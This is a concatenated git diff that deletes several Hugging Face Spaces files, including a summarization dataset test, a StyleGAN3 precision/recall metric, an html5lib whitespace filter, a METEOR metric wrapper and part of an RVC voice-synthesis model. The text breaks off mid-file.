a/spaces/akhaliq/SummerTime/tests/dataset_test.py +++ /dev/null @@ -1,83 +0,0 @@ -import unittest - -from dataset import SUPPORTED_SUMM_DATASETS, list_all_datasets -from dataset.st_dataset import SummDataset, SummInstance -from dataset.dataset_loaders import ArxivDataset - -from helpers import print_with_color - - -class TestDatasets(unittest.TestCase): - def _test_instance( - self, - ins: SummInstance, - is_query: bool = False, - is_multi_document: bool = False, - is_dialogue: bool = False, - ): - if is_multi_document or is_dialogue: - self.assertTrue(isinstance(ins.source, list)) - else: - self.assertTrue(isinstance(ins.source, list) or isinstance(ins.source, str)) - if is_query: - self.assertTrue(isinstance(ins.query, str)) - - def test_all_datasets(self): - print_with_color(f"{'#' * 10} Testing all datasets... {'#' * 10}\n\n", "35") - - print(list_all_datasets()) - - num_datasets = 0 - - for ds_cls in SUPPORTED_SUMM_DATASETS: - - # TODO: Temporarily skipping Arxiv (size/time), > 30min download time for Travis-CI - if ds_cls in [ArxivDataset]: - continue - - print_with_color(f"Testing {ds_cls} dataset...", "35") - ds: SummDataset = ds_cls() - - ds.show_description() - - # must have at least one of train/dev/test set - assert ds.train_set or ds.validation_set or ds.test_set - - if ds.train_set is not None: - train_set = list(ds.train_set) - print(f"{ds_cls} has a training set of {len(train_set)} examples") - self._test_instance( - train_set[0], - is_multi_document=ds.is_multi_document, - is_dialogue=ds.is_dialogue_based, - ) - - if ds.validation_set is not None: - val_set = list(ds.validation_set) - print(f"{ds_cls} has a validation set of {len(val_set)} examples") - self._test_instance( - val_set[0], - is_multi_document=ds.is_multi_document, - is_dialogue=ds.is_dialogue_based, - ) - - if ds.test_set is not None: - test_set = list(ds.test_set) - print(f"{ds_cls} has a test set of {len(test_set)} examples") - self._test_instance( - test_set[0], - is_multi_document=ds.is_multi_document, - is_dialogue=ds.is_dialogue_based, - ) - - print_with_color(f"{ds.dataset_name} dataset test complete\n", "32") - num_datasets += 1 - - print_with_color( - f"{'#' * 10} test_all_datasets {__name__} complete ({num_datasets} datasets) {'#' * 10}", - "32", - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/akhaliq/stylegan3_clip/metrics/precision_recall.py b/spaces/akhaliq/stylegan3_clip/metrics/precision_recall.py deleted file mode 100644 index 17e5b4286b43e2d09aeba19d2521869a6cbe7ea1..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/stylegan3_clip/metrics/precision_recall.py +++ /dev/null @@ -1,62 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Precision/Recall (PR) from the paper "Improved Precision and Recall -Metric for Assessing Generative Models". Matches the original implementation -by Kynkaanniemi et al. at -https://github.com/kynkaat/improved-precision-and-recall-metric/blob/master/precision_recall.py""" - -import torch -from . import metric_utils - -#---------------------------------------------------------------------------- - -def compute_distances(row_features, col_features, num_gpus, rank, col_batch_size): - assert 0 <= rank < num_gpus - num_cols = col_features.shape[0] - num_batches = ((num_cols - 1) // col_batch_size // num_gpus + 1) * num_gpus - col_batches = torch.nn.functional.pad(col_features, [0, 0, 0, -num_cols % num_batches]).chunk(num_batches) - dist_batches = [] - for col_batch in col_batches[rank :: num_gpus]: - dist_batch = torch.cdist(row_features.unsqueeze(0), col_batch.unsqueeze(0))[0] - for src in range(num_gpus): - dist_broadcast = dist_batch.clone() - if num_gpus > 1: - torch.distributed.broadcast(dist_broadcast, src=src) - dist_batches.append(dist_broadcast.cpu() if rank == 0 else None) - return torch.cat(dist_batches, dim=1)[:, :num_cols] if rank == 0 else None - -#---------------------------------------------------------------------------- - -def compute_pr(opts, max_real, num_gen, nhood_size, row_batch_size, col_batch_size): - detector_url = 'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/metrics/vgg16.pkl' - detector_kwargs = dict(return_features=True) - - real_features = metric_utils.compute_feature_stats_for_dataset( - opts=opts, detector_url=detector_url, detector_kwargs=detector_kwargs, - rel_lo=0, rel_hi=0, capture_all=True, max_items=max_real).get_all_torch().to(torch.float16).to(opts.device) - - gen_features = metric_utils.compute_feature_stats_for_generator( - opts=opts, detector_url=detector_url, detector_kwargs=detector_kwargs, - rel_lo=0, rel_hi=1, capture_all=True, max_items=num_gen).get_all_torch().to(torch.float16).to(opts.device) - - results = dict() - for name, manifold, probes in [('precision', real_features, gen_features), ('recall', gen_features, real_features)]: - kth = [] - for manifold_batch in manifold.split(row_batch_size): - dist = compute_distances(row_features=manifold_batch, col_features=manifold, num_gpus=opts.num_gpus, rank=opts.rank, col_batch_size=col_batch_size) - kth.append(dist.to(torch.float32).kthvalue(nhood_size + 1).values.to(torch.float16) if opts.rank == 0 else None) - kth = torch.cat(kth) if opts.rank == 0 else None - pred = [] - for probes_batch in probes.split(row_batch_size): - dist = compute_distances(row_features=probes_batch, col_features=manifold, num_gpus=opts.num_gpus, rank=opts.rank, col_batch_size=col_batch_size) - pred.append((dist <= kth).any(dim=1) if opts.rank == 0 else None) - results[name] = float(torch.cat(pred).to(torch.float32).mean() if opts.rank == 0 else 'nan') - return results['precision'], results['recall'] - -#---------------------------------------------------------------------------- diff --git a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/filters/whitespace.py b/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/filters/whitespace.py deleted file mode 100644 index 0d12584b45995d35110f75af00193fdad0fa10f4..0000000000000000000000000000000000000000 --- a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/filters/whitespace.py +++ /dev/null @@ -1,38 +0,0 @@ -from __future__ import absolute_import, division, unicode_literals - -import re - -from . import base -from ..constants import rcdataElements, spaceCharacters -spaceCharacters = "".join(spaceCharacters) - -SPACES_REGEX = re.compile("[%s]+" % spaceCharacters) - - -class Filter(base.Filter): - """Collapses whitespace except in pre, textarea, and script elements""" - spacePreserveElements = frozenset(["pre", "textarea"] + list(rcdataElements)) - - def __iter__(self): - preserve = 0 - for token in base.Filter.__iter__(self): - type = token["type"] - if type == "StartTag" \ - and (preserve or token["name"] in self.spacePreserveElements): - preserve += 1 - - elif type == "EndTag" and preserve: - preserve -= 1 - - elif not preserve and type == "SpaceCharacters" and token["data"]: - # Test on token["data"] above to not introduce spaces where there were not - token["data"] = " " - - elif not preserve and type == "Characters": - token["data"] = collapse_spaces(token["data"]) - - yield token - - -def collapse_spaces(text): - return SPACES_REGEX.sub(' ', text) diff --git a/spaces/aliabd/SummerTime/evaluation/meteor_metric.py b/spaces/aliabd/SummerTime/evaluation/meteor_metric.py deleted file mode 100644 index e2c6c0bfc340b461a9660d6a2da63a35d3e1177a..0000000000000000000000000000000000000000 --- a/spaces/aliabd/SummerTime/evaluation/meteor_metric.py +++ /dev/null @@ -1,31 +0,0 @@ -from .base_metric import SummMetric -from typing import List, Dict -from nltk.translate import meteor_score as nltk_meteor -import nltk -import statistics - - -class Meteor(SummMetric): - metric_name = "meteor" - range = (0, 1) - higher_is_better = True - requires_heavy_compute = False - - def __init__(self): - nltk.download("wordnet") - - def evaluate( - self, inputs: List[str], targets: List[str], keys=["meteor"] - ) -> Dict[str, float]: - - for key in keys: - if key != "meteor": - raise KeyError(key, "is not a valid key") - - meteor_scores = [ - nltk_meteor.meteor_score([input], target) - for input, target in zip(inputs, targets) - ] - meteor_score = statistics.mean(meteor_scores) - - return {key: meteor_score for key in keys} diff --git a/spaces/aliceoq/vozes-da-loirinha/lib/infer_pack/models.py b/spaces/aliceoq/vozes-da-loirinha/lib/infer_pack/models.py deleted file mode 100644 index 3665d03bc0514a6ed07d3372ea24717dae1e0a65..0000000000000000000000000000000000000000 --- a/spaces/aliceoq/vozes-da-loirinha/lib/infer_pack/models.py +++ /dev/null @@ -1,1142 +0,0 @@ -import math, pdb, os -from time import time as ttime -import torch -from torch import nn -from torch.nn import functional as F -from lib.infer_pack import modules -from lib.infer_pack import attentions -from lib.infer_pack import commons -from lib.infer_pack.commons import init_weights, get_padding -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from lib.infer_pack.commons import init_weights -import numpy as np -from lib.infer_pack import commons - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder768(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(768, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - -class PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, - ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMs256NSFsid(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward( - self, phone, phone_lengths, pitch, pitchf, y, y_lengths, ds - ): # 这里ds是id,[bs,1] - # print(1,pitch.shape)#[bs,t] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - # print(-1,pitchf.shape,ids_slice,self.segment_size,self.hop_length,self.segment_size//self.hop_length) - pitchf = commons.slice_segments2(pitchf, ids_slice, self.segment_size) - # print(-2,pitchf.shape,z_slice.shape) - o = self.dec(z_slice, pitchf, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, pitch, nsff0, sid, rate=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - if rate: - head = int(z_p.shape[2] * rate) - z_p = z_p[:, :, -head:] - x_mask = x_mask[:, :, -head:] - nsff0 = nsff0[:, -head:] - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec(z * x_mask, nsff0, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs768NSFsid(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward( - self, phone, phone_lengths, pitch, pitchf, y, y_lengths, ds - ): # 这里ds是id,[bs,1] - # print(1,pitch.shape)#[bs,t] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - # print(-1,pitchf.shape,ids_slice,self.segment_size,self.hop_length,self.segment_size//self.hop_length) - pitchf = commons.slice_segments2(pitchf, ids_slice, self.segment_size) - # print(-2,pitchf.shape,z_slice.shape) - o = self.dec(z_slice, pitchf, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, pitch, nsff0, sid, rate=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - if rate: - head = int(z_p.shape[2] * rate) - z_p = z_p[:, :, -head:] - x_mask = x_mask[:, :, -head:] - nsff0 = nsff0[:, -head:] - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec(z * x_mask, nsff0, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs256NSFsid_nono(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr=None, - **kwargs - ): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=False, - ) - self.dec = Generator( - inter_channels, - resblock, - 